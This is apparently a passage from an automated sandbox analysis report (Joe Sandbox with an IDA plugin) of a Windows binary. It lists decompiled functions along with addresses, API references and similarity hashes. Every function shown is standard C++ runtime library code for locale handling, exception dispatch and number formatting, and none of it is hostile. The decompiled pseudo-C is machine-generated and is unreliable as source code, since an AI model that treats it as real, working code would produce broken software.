				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0044979e
0x004497a5
0x004497af
0x004497b4
0x004497ba
0x004497c3
0x004497c6
0x004497cb
0x004497cf
0x004497d4
0x004497d8
0x004497dc
0x004497e2
0x004497e8
0x004497e9
0x004497f0
0x004497f3
0x004497fd
0x0044980b
0x0044980b
0x00449810
0x00449815
0x0044981b
0x00449821
0x004497de
0x004497de
0x004497de
0x004497dc
0x00449827
0x0044982e
0x0044983a

APIs

__EH_prolog3.LIBCMT ref: 004497A5
std::_Lockit::_Lockit.LIBCPMT ref: 004497AF

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

std::bad_exception::bad_exception.LIBCMT ref: 004497FD
__CxxThrowException@8.LIBCMT ref: 0044980B
std::locale::facet::_Facet_Register.LIBCPMT ref: 00449821

Strings

bad cast, xrefs: 004497F5

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2227438316-3145022300
Opcode ID: a4e1579c0f00c23d8560ff895cfbfa068624abc6c005a3c9e032afc1ad8d8c7f
Instruction ID: 7895b4928d7fb873d8c0f5f8625c124b7364bcd97ae5d03ed8c2d086949c383c
Opcode Fuzzy Hash: a4e1579c0f00c23d8560ff895cfbfa068624abc6c005a3c9e032afc1ad8d8c7f
Instruction Fuzzy Hash: 76018E319001159ADF05FBA1D802AAEB328AB84724F64052FF4117B2E1DB7C9D05979D

Uniqueness

Uniqueness Score: -1.00%

Function 0043ED86 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043ED86(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464608; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043E48A(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464608 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043ed86
0x0043ed8d
0x0043ed97
0x0043ed9c
0x0043eda2
0x0043edab
0x0043edae
0x0043edb3
0x0043edb7
0x0043edbc
0x0043edc0
0x0043edc4
0x0043edca
0x0043edd0
0x0043edd1
0x0043edd8
0x0043eddb
0x0043ede5
0x0043edf3
0x0043edf3
0x0043edf8
0x0043edfd
0x0043ee03
0x0043ee09
0x0043edc6
0x0043edc6
0x0043edc6
0x0043edc4
0x0043ee0f
0x0043ee16
0x0043ee22

APIs

__EH_prolog3.LIBCMT ref: 0043ED8D
std::_Lockit::_Lockit.LIBCPMT ref: 0043ED97

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

std::bad_exception::bad_exception.LIBCMT ref: 0043EDE5
__CxxThrowException@8.LIBCMT ref: 0043EDF3
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043EE09

Strings

bad cast, xrefs: 0043EDDD

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2227438316-3145022300
Opcode ID: 9218c1154e7a867e4d6e4ab43627301e3e1fb76cc326486c8644edcacb4cd570
Instruction ID: aa2f9df48421b902836763fb3caf65df7e1cf7f34c6207b32e27367e2294e6a2
Opcode Fuzzy Hash: 9218c1154e7a867e4d6e4ab43627301e3e1fb76cc326486c8644edcacb4cd570
Instruction Fuzzy Hash: 3701C03190121597CF05EBA2D812ABE7235AF84764F64052FF4107B2E1DF7C9905C79D

Uniqueness

Uniqueness Score: -1.00%

Function 00448EF6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00448EF6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t42;
				void* _t43;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t43 - 0x14, 0);
				_t42 =  *0x46466c; // 0x0
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				 *((intOrPtr*)(_t43 - 0x10)) = _t42;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t43 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t43 + 8)), _t17);
				_t40 = _t18;
				if(_t18 == 0) {
					if(_t42 == 0) {
						_push( *((intOrPtr*)(_t43 + 8)));
						_push(_t43 - 0x10);
						_t23 = E00448C64(__ebx, _t32, _t40, _t42, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t43 - 0x20, "bad cast");
							E00422CB4(_t43 - 0x20, 0x4597cc);
						}
						_t40 =  *((intOrPtr*)(_t43 - 0x10));
						 *0x46466c =  *((intOrPtr*)(_t43 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t43 - 0x10)), _t40);
					} else {
						_t40 = _t42;
					}
				}
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				E0040D978(_t43 - 0x14);
				return E0042574F(_t40);
			}

0x00448ef6
0x00448efd
0x00448f07
0x00448f0c
0x00448f12
0x00448f1b
0x00448f1e
0x00448f23
0x00448f27
0x00448f2c
0x00448f30
0x00448f34
0x00448f3a
0x00448f40
0x00448f41
0x00448f48
0x00448f4b
0x00448f55
0x00448f63
0x00448f63
0x00448f68
0x00448f6d
0x00448f73
0x00448f79
0x00448f36
0x00448f36
0x00448f36
0x00448f34
0x00448f7f
0x00448f86
0x00448f92

APIs

__EH_prolog3.LIBCMT ref: 00448EFD
std::_Lockit::_Lockit.LIBCPMT ref: 00448F07

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

std::bad_exception::bad_exception.LIBCMT ref: 00448F55
__CxxThrowException@8.LIBCMT ref: 00448F63
std::locale::facet::_Facet_Register.LIBCPMT ref: 00448F79

Strings

bad cast, xrefs: 00448F4D

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2227438316-3145022300
Opcode ID: 52a7e9192961d59db6b3527390a3ba1f56db8624a4f50d97994a9a33c568bcf7
Instruction ID: 4ef384ca760d2e3124d99050fd74c035ec0334ddb3c98b22e239171aefdd6c47
Opcode Fuzzy Hash: 52a7e9192961d59db6b3527390a3ba1f56db8624a4f50d97994a9a33c568bcf7
Instruction Fuzzy Hash: D2010031A006159BDF05EBA1C842ABE7235AF80328FA4012FF8107B2E1DF7C9909C79D

Uniqueness

Uniqueness Score: -1.00%

Function 004267DE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004267DE(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t13;
				void* _t16;
				intOrPtr* _t20;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t24 = __ebx;
				_t13 =  *((intOrPtr*)( *_a4));
				if(_t13 == 0xe0434352 || _t13 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E00427FEA(_t25, _t26, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E00427FEA(_t25, _t26, __eflags);
						_t5 = _t16 + 0x90;
						 *_t5 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t5;
					}
					goto L6;
				} else {
					_t34 = _t13 - 0xe06d7363;
					if(_t13 != 0xe06d7363) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						 *(E00427FEA(__edx, __edi, _t34) + 0x90) =  *(_t17 + 0x90) & 0x00000000;
						_push(8);
						_push(0x45bf28);
						E0042A1F0(__ebx, __edi, __esi);
						_t20 =  *((intOrPtr*)(E00427FEA(__edx, _t26, _t34) + 0x78));
						if(_t20 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t20();
							_v8 = 0xfffffffe;
						}
						return E0042A235(E004278A5(_t24, _t25, _t26, _t27));
					}
				}
			}

0x004267de
0x004267de
0x004267de
0x004267de
0x004267e8
0x004267ef
0x00426815
0x0042681c
0x0042681e
0x00426823
0x00426823
0x00426823
0x00426823
0x00000000
0x004267f8
0x004267f8
0x004267fd
0x00426829
0x00426829
0x0042682c
0x004267ff
0x00426804
0x004282ae
0x004282b0
0x004282b5
0x004282bf
0x004282c4
0x004282c6
0x004282ca
0x004282d5
0x004282d5
0x004282e6
0x004282e6
0x004267fd

APIs

__getptd.LIBCMT ref: 004267FF

Part of subcall function 00427FEA: __getptd_noexit.LIBCMT ref: 00427FED
Part of subcall function 00427FEA: __amsg_exit.LIBCMT ref: 00427FFA

__getptd.LIBCMT ref: 00426810
__getptd.LIBCMT ref: 0042681E

Strings

MOC, xrefs: 004267F1
csm, xrefs: 004267F8
RCC, xrefs: 004267EA

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 3c8e2d9377ad3e7de3b269c8e97a6e00205634a478c15d23bb89b451f4d18ca6
Instruction ID: 3657ebd0c7b3a71cf72bb19e74416c06708cfce90bdc999ce92172d368ac36c9
Opcode Fuzzy Hash: 3c8e2d9377ad3e7de3b269c8e97a6e00205634a478c15d23bb89b451f4d18ca6
Instruction Fuzzy Hash: DBE012347092648FC710A765E54AB793694BF44318F9B48E7E40CC7322DB3CD850C95A

Uniqueness

Uniqueness Score: -1.00%

Function 0044321D Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 410
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0044321D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t227;
				intOrPtr _t228;
				signed short _t233;
				intOrPtr _t238;
				signed int _t244;
				char* _t245;
				void* _t249;
				signed int _t251;
				void* _t253;
				void* _t254;
				signed int* _t256;
				signed int* _t258;
				signed int* _t269;
				signed int* _t271;
				signed int* _t273;
				signed int _t275;
				signed int* _t280;
				signed int* _t282;
				signed short _t285;
				signed int* _t290;
				signed int _t292;
				signed int* _t294;
				signed int* _t297;
				char* _t299;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				intOrPtr _t309;
				signed int _t311;
				signed int _t313;
				char* _t315;
				intOrPtr _t320;
				void* _t336;
				signed int _t348;
				intOrPtr* _t363;
				intOrPtr* _t365;
				void* _t366;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t373;
				void* _t375;
				intOrPtr _t391;

				_t375 = __eflags;
				E00425719(E0044F908, __ebx, __edi, __esi);
				_t320 =  *((intOrPtr*)(_t366 + 0x18));
				_t361 =  *((intOrPtr*)(_t366 + 8));
				_t363 =  *((intOrPtr*)(_t366 + 0x20));
				 *((intOrPtr*)(_t366 - 0x8c)) =  *((intOrPtr*)(_t366 + 0xc));
				 *(_t366 - 0x7c) =  *(_t366 + 0x1c) & 0x0000ffff;
				 *(_t366 - 0x5c) =  *(_t366 + 0x24);
				 *(_t366 - 0x74) =  *(_t366 + 0x28);
				 *(_t366 - 0x54) =  *(_t366 + 0x2c);
				 *(_t366 - 0x50) =  *(_t366 + 0x30);
				_t227 = E004013A0(_t366 - 0x68);
				 *(_t366 - 4) =  *(_t366 - 4) & 0x00000000;
				_t228 = E0043DCE8(_t320, __edx,  *((intOrPtr*)(_t366 + 8)), _t363, _t375);
				 *(_t366 - 4) =  *(_t366 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t366 - 0x78)) = _t228;
				E004012D0();
				E0043E9B7( *((intOrPtr*)(_t366 - 0x78)), _t366 - 0x48);
				 *(_t366 - 4) = 1;
				_t233 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t366 - 0x78)))) + 8))(_t227, 0x80);
				 *(_t366 - 0x1c) =  *(_t366 - 0x1c) & 0x00000000;
				 *(_t366 - 0x80) = _t233 & 0x0000ffff;
				 *((intOrPtr*)(_t366 - 0x18)) = 0xf;
				 *((char*)(_t366 - 0x2c)) = 0;
				 *(_t366 - 4) = 2;
				 *(_t366 - 0x70) = E0043B943( *((intOrPtr*)(_t366 - 0x78)), 0x30, 0,  *((intOrPtr*)(_t366 + 8)) + 8) & 0x0000ffff;
				_t238 =  *_t363;
				_t368 = _t367 + 0xc;
				if(_t238 == 0x2b) {
					L3:
					 *(_t366 - 0x84) = 1;
					L4:
					 *((char*)(_t366 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(E004230FE(_t320, _t361, _t363, _t377)))));
					 *((short*)(_t366 - 0x57)) = 0x65;
					 *(_t366 - 0x4c) = E00423130(_t363, 0x65,  *(_t366 - 0x50));
					_t244 = E00423130(_t363,  *((char*)(_t366 - 0x58)),  *(_t366 - 0x50));
					_t369 = _t368 + 0x18;
					 *(_t366 - 0x60) = _t244;
					if(_t244 == 0) {
						 *(_t366 - 0x54) =  *(_t366 - 0x54) & _t244;
					}
					_t245 =  *((intOrPtr*)(_t366 - 0x48));
					if( *((intOrPtr*)(_t366 - 0x34)) < 0x10) {
						_t245 = _t366 - 0x48;
					}
					if( *_t245 == 0x7f) {
						L33:
						_t326 =  *(_t320 + 0x20);
						_t249 =  *(_t366 - 0x50) +  *(_t366 - 0x54) +  *(_t366 - 0x74) +  *(_t366 - 0x5c);
						_t391 =  *((intOrPtr*)(_t320 + 0x24));
						if(_t391 < 0 || _t391 <= 0 && _t326 <= 0 || _t326 <= _t249) {
							 *(_t366 - 0x4c) = 0;
						} else {
							 *(_t366 - 0x4c) = _t326;
						}
						_t251 =  *(_t320 + 0x14) & 0x000001c0;
						if(_t251 != 0x40) {
							if(_t251 == 0x100 &&  *(_t366 - 0x84) > 0) {
								_t297 = E0043C5AD(_t326, _t361, _t366 - 0x64,  *(_t366 + 0x10),  *(_t366 + 0x14), _t363, 1);
								_t369 = _t369 + 0x18;
								 *(_t366 + 0x10) =  *_t297;
								_t363 = _t363 + 1;
								 *(_t366 - 0x50) =  *(_t366 - 0x50) - 1;
								 *(_t366 + 0x14) = _t297[1];
							}
							_t294 = E0043D357(_t361, _t366 - 0x64,  *(_t366 + 0x10),  *(_t366 + 0x14),  *(_t366 - 0x7c),  *(_t366 - 0x4c));
							_t326 =  *_t294;
							 *(_t366 + 0x10) =  *_t294;
							_t369 = _t369 + 0x18;
							 *(_t366 - 0x4c) =  *(_t366 - 0x4c) & 0x00000000;
							 *(_t366 + 0x14) = _t294[1];
						}
						_t253 = E00423130(_t363,  *((char*)(_t366 - 0x58)),  *(_t366 - 0x50));
						_t370 = _t369 + 0xc;
						if(_t253 != 0) {
							 *(_t366 - 0x60) = _t253 - _t363 + 1;
							_t280 = E0043D38C(_t326, _t361, _t366 - 0x88,  *(_t366 + 0x10),  *(_t366 + 0x14), _t363, _t253 - _t363 + 1 - 1,  *(_t366 - 0x80));
							 *(_t366 + 0x10) =  *_t280;
							 *(_t366 + 0x14) = _t280[1];
							_t282 = E0043D357(_t361, _t366 - 0x88,  *_t280, _t280[1],  *(_t366 - 0x70),  *(_t366 - 0x5c));
							 *(_t366 + 0x10) =  *_t282;
							 *(_t366 + 0x14) = _t282[1];
							_t285 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t366 - 0x78)))) + 4))();
							 *(_t366 - 0x6c) =  *(_t366 + 0x10);
							 *(_t366 - 0x68) =  *(_t366 + 0x14);
							E0043C582(_t366 - 0x6c, _t285 & 0x0000ffff);
							 *(_t366 + 0x10) =  *(_t366 - 0x6c);
							 *(_t366 + 0x14) =  *(_t366 - 0x68);
							_t290 = E0043D357(_t361, _t366 - 0x6c,  *(_t366 - 0x6c),  *(_t366 - 0x68),  *(_t366 - 0x70),  *(_t366 - 0x74));
							_t326 =  *_t290;
							 *(_t366 + 0x10) =  *_t290;
							 *(_t366 + 0x14) = _t290[1];
							_t292 =  *(_t366 - 0x60);
							_t370 = _t370 + 0x4c;
							_t363 = _t363 + _t292;
							 *(_t366 - 0x50) =  *(_t366 - 0x50) - _t292;
						}
						_t254 = E00423130(_t363, 0x65,  *(_t366 - 0x50));
						_t371 = _t370 + 0xc;
						if(_t254 != 0) {
							 *(_t366 - 0x68) = _t254 - _t363 + 1;
							_t269 = E0043D38C(_t326, _t361, _t366 - 0x64,  *(_t366 + 0x10),  *(_t366 + 0x14), _t363, _t254 - _t363 + 1 - 1,  *(_t366 - 0x80));
							 *(_t366 + 0x10) =  *_t269;
							 *(_t366 + 0x14) = _t269[1];
							_t271 = E0043D357(_t361, _t366 - 0x64,  *_t269, _t269[1],  *(_t366 - 0x70),  *(_t366 - 0x54));
							 *(_t366 - 0x54) =  *(_t366 - 0x54) & 0x00000000;
							 *(_t366 + 0x10) =  *_t271;
							_t373 = _t371 + 0x34;
							 *(_t366 + 0x14) = _t271[1];
							_t336 = 0x45163c;
							if(( *(_t320 + 0x14) & 0x00000004) == 0) {
								_t336 = 0x451638;
							}
							_t273 = E0043C5AD(_t336, _t361, _t366 - 0x64,  *_t271, _t271[1], _t336, 1);
							_t326 =  *_t273;
							 *(_t366 + 0x10) =  *_t273;
							 *(_t366 + 0x14) = _t273[1];
							_t275 =  *(_t366 - 0x68);
							_t371 = _t373 + 0x18;
							_t363 = _t363 + _t275;
							 *(_t366 - 0x50) =  *(_t366 - 0x50) - _t275;
						}
						_t256 = E0043D38C(_t326, _t361, _t366 - 0x6c,  *(_t366 + 0x10),  *(_t366 + 0x14), _t363,  *(_t366 - 0x50),  *(_t366 - 0x80));
						 *(_t366 + 0x10) =  *_t256;
						 *(_t366 + 0x14) = _t256[1];
						_t258 = E0043D357(_t361, _t366 - 0x64,  *_t256, _t256[1],  *(_t366 - 0x70),  *(_t366 - 0x54));
						 *(_t366 + 0x10) =  *_t258;
						 *(_t366 + 0x14) = _t258[1];
						 *(_t320 + 0x20) = 0;
						 *((intOrPtr*)(_t320 + 0x24)) = 0;
						E0043D357(_t361,  *((intOrPtr*)(_t366 - 0x8c)),  *_t258, _t258[1],  *(_t366 - 0x7c),  *(_t366 - 0x4c));
						E00402E20(_t366 - 0x2c, 1, 0);
						E00402E20(_t366 - 0x48, 1, 0);
						return E00425763(_t320, _t361, 0);
					} else {
						_t299 =  *((intOrPtr*)(_t366 - 0x48));
						if( *((intOrPtr*)(_t366 - 0x34)) < 0x10) {
							_t299 = _t366 - 0x48;
						}
						if( *_t299 > 0) {
							E00403F40(_t366 - 0x2c, _t363,  *(_t366 - 0x50));
							_t301 =  *(_t366 - 0x4c);
							if(_t301 != 0) {
								__eflags =  *(_t366 - 0x60);
								if( *(_t366 - 0x60) == 0) {
									E00403B10(_t366 - 0x2c,  *(_t366 - 0x5c), 0x30);
									_t62 = _t366 - 0x5c;
									 *_t62 =  *(_t366 - 0x5c) & 0x00000000;
									__eflags =  *_t62;
									_t301 =  *(_t366 - 0x4c);
								}
								__eflags = _t301 - _t363;
								E00404060(_t366 - 0x2c, _t301 - _t363,  *(_t366 - 0x54), 0x30);
							} else {
								E00403B10(_t366 - 0x2c,  *(_t366 - 0x54), 0x30);
							}
							_t304 =  *(_t366 - 0x60);
							_push(0x30);
							_t348 = _t366 - 0x2c;
							if(_t304 != 0) {
								_push( *(_t366 - 0x74));
								_t305 = _t304 - _t363;
								 *(_t366 - 0x60) = _t305;
								_push(_t305 + 1);
								E00404060(_t348);
								E00404060(_t366 - 0x2c,  *(_t366 - 0x60),  *(_t366 - 0x5c), 0x30);
								_t75 = _t366 - 0x74;
								 *_t75 =  *(_t366 - 0x74) & 0x00000000;
								__eflags =  *_t75;
							} else {
								_push( *(_t366 - 0x5c));
								E00403B10(_t348);
							}
							 *(_t366 - 0x5c) =  *(_t366 - 0x5c) & 0x00000000;
							_t365 =  *((intOrPtr*)(_t366 - 0x48));
							if( *((intOrPtr*)(_t366 - 0x34)) < 0x10) {
								_t365 = _t366 - 0x48;
							}
							_t309 =  *((intOrPtr*)(_t366 - 0x2c));
							if( *((intOrPtr*)(_t366 - 0x18)) < 0x10) {
								_t309 = _t366 - 0x2c;
							}
							 *(_t366 - 0x4c) = E004231E0(_t366 - 0x58, _t309, _t366 - 0x58);
							while(1) {
								_t311 =  *_t365;
								if(_t311 == 0x7f) {
									break;
								}
								__eflags = _t311;
								if(_t311 <= 0) {
									break;
								}
								_t313 = _t311;
								__eflags = _t313 -  *(_t366 - 0x4c) -  *(_t366 - 0x84);
								if(_t313 >=  *(_t366 - 0x4c) -  *(_t366 - 0x84)) {
									break;
								}
								 *(_t366 - 0x4c) =  *(_t366 - 0x4c) - _t313;
								E00404060(_t366 - 0x2c,  *(_t366 - 0x4c), 1, 0);
								_t315 = _t365 + 1;
								__eflags =  *_t315;
								if( *_t315 > 0) {
									_t365 = _t315;
								}
							}
							_t363 =  *((intOrPtr*)(_t366 - 0x2c));
							if( *((intOrPtr*)(_t366 - 0x18)) < 0x10) {
								_t363 = _t366 - 0x2c;
							}
							 *(_t366 - 0x54) =  *(_t366 - 0x54) & 0x00000000;
							 *(_t366 - 0x50) =  *(_t366 - 0x1c);
						}
						goto L33;
					}
				}
				_t377 = _t238 - 0x2d;
				if(_t238 == 0x2d) {
					goto L3;
				}
				 *(_t366 - 0x84) =  *(_t366 - 0x84) & 0x00000000;
				goto L4;
			}

0x0044321d
0x00443227
0x0044322f
0x00443232
0x00443235
0x00443238
0x00443242
0x00443248
0x0044324e
0x00443254
0x0044325a
0x00443263
0x00443268
0x0044326d
0x00443272
0x0044327a
0x0044327d
0x00443289
0x00443293
0x0044329a
0x0044329d
0x004432a4
0x004432a7
0x004432ae
0x004432ba
0x004432c6
0x004432c9
0x004432cb
0x004432d0
0x004432df
0x004432df
0x004432e9
0x004432f8
0x004432fb
0x00443309
0x00443312
0x00443317
0x0044331a
0x0044331f
0x00443321
0x00443321
0x00443328
0x0044332b
0x0044332d
0x0044332d
0x00443333
0x0044344c
0x00443452
0x0044345a
0x0044345d
0x00443460
0x00443473
0x0044346c
0x0044346e
0x0044346e
0x00443479
0x00443481
0x00443488
0x004434a0
0x004434a7
0x004434aa
0x004434b0
0x004434b1
0x004434b4
0x004434b4
0x004434c8
0x004434cd
0x004434cf
0x004434d5
0x004434d8
0x004434dc
0x004434dc
0x004434e8
0x004434ed
0x004434f2
0x004434fe
0x00443512
0x0044351c
0x00443525
0x00443535
0x0044353c
0x00443545
0x0044354d
0x00443553
0x0044355c
0x00443563
0x00443576
0x0044357e
0x00443581
0x00443586
0x00443588
0x0044358e
0x00443591
0x00443594
0x00443597
0x00443599
0x00443599
0x004435a2
0x004435a7
0x004435ac
0x004435b8
0x004435c9
0x004435d3
0x004435dc
0x004435e9
0x004435f0
0x004435f4
0x004435fa
0x00443601
0x00443604
0x00443609
0x0044360b
0x0044360b
0x0044361d
0x00443622
0x00443624
0x0044362a
0x0044362d
0x00443630
0x00443633
0x00443635
0x00443635
0x0044364a
0x00443654
0x0044365d
0x0044366a
0x00443674
0x00443687
0x0044368b
0x0044368e
0x00443691
0x0044369f
0x004436aa
0x004436ba
0x00443339
0x0044333d
0x00443340
0x00443342
0x00443342
0x00443348
0x00443355
0x0044335a
0x0044335f
0x00443370
0x00443374
0x0044337e
0x00443383
0x00443383
0x00443383
0x00443387
0x00443387
0x0044338f
0x00443395
0x00443361
0x00443369
0x00443369
0x0044339a
0x0044339d
0x0044339f
0x004433a4
0x004433b0
0x004433b3
0x004433b5
0x004433b9
0x004433ba
0x004433ca
0x004433cf
0x004433cf
0x004433cf
0x004433a6
0x004433a6
0x004433a9
0x004433a9
0x004433d3
0x004433db
0x004433de
0x004433e0
0x004433e0
0x004433e7
0x004433ea
0x004433ec
0x004433ec
0x004433fb
0x00443430
0x00443430
0x00443434
0x00000000
0x00000000
0x00443400
0x00443402
0x00000000
0x00000000
0x0044340d
0x00443410
0x00443412
0x00000000
0x00000000
0x00443414
0x00443421
0x00443426
0x00443429
0x0044342c
0x0044342e
0x0044342e
0x0044342c
0x0044343a
0x0044343d
0x0044343f
0x0044343f
0x00443445
0x00443449
0x00443449
0x00000000
0x00443348
0x00443333
0x004432d2
0x004432d4
0x00000000
0x00000000
0x004432d6
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00443227

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 0043DCE8: __EH_prolog3.LIBCMT ref: 0043DCEF
Part of subcall function 0043DCE8: std::_Lockit::_Lockit.LIBCPMT ref: 0043DCF9

Part of subcall function 004012D0: std::_Lockit::_Lockit.LIBCPMT ref: 004012DE

_Maklocchr.LIBCPMT ref: 004432BE
_localeconv.LIBCMT ref: 004432E9
_strcspn.LIBCMT ref: 004433F4

Strings

e, xrefs: 004432FB

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$H_prolog3H_prolog3_Maklocchr_localeconv_strcspn
String ID: e
API String ID: 3350728577-4024072794
Opcode ID: fa148435da3a625c11a8bc374a7fe6a7e6c4d27c58bc322fe18d0a52c9db9f7a
Instruction ID: 1c5d3516dca86e2739136b2baface514d1b6d5844031ca6a75f3421199c15850
Opcode Fuzzy Hash: fa148435da3a625c11a8bc374a7fe6a7e6c4d27c58bc322fe18d0a52c9db9f7a
Instruction Fuzzy Hash: 06026670D00249AFEF15DFA4C885AEEBBB5FF08305F04806AF805AB251D779AA11CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00442342 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 410
COMMON

Download Yara Rule

C-Code - Quality: 92%

